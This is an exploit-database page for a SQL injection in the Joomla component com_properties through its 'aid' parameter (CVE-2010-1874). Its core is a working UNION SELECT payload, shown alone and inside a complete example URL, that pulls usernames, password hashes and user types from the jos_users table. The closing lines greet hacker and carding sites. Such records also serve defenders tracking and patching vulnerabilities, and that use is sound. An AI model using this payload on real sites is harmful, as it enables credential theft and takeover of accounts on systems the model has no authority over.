ad

Joomla Component com_properties[aid] SQL Injection Vulnerability



EDB-ID: 12136 CVE: 2010-1874 OSVDB-ID: 64595
Author: c4uR Published: 2010-04-10 Verified: Not Verified
Exploit Code:   Download Vulnerable App:   N/A

Rating

(0.0)
Prev Home Next
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

Author: c4uR [caurcdma@yahoo.com]
Date: April, 10-2010 [INDONESIA]
Exploit Title: Joomla Component com_properties[aid] SQL Injection Vulnerability

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

###################################################################################

+++ Vulnerable File +++
       http://127.0.0.1/index.php?option=com_properties&task=agentlisting&aid=[gubr4k]

+++ ExploiT +++
       -91+UNION+ALL+SELECT+1,2,version(),4,group_concat(username,0x3a,password,0x3a,usertype,0x3c62723e)c4uR,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32+from+jos_users--

+++ Example +++
       http://127.0.0.1/index.php?option=com_properties&task=agentlisting&aid=-91+UNION+ALL+SELECT+1,2,version(),4,group_concat(username,0x3a,password,0x3a,usertype,0x3c62723e)c4uR,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32+from+jos_users--



###################################################################################

----------------------------------------------------------------------------------

DEVILZC0DE.ORG + INDONESIANHACKER.ORG + HACKER-NEWBIE.ORG + YOGYACARDERLINK.WEB.ID
hashkiller.com + insidepro.com + xaknet.ru + turkishajan.com

----------------------------------------------------------------------------------

[ thnx to ]

[+] Apartement Griya Semanggi + poisonV
[+] Indonesia gg ada matinye, walaupun terkadang suram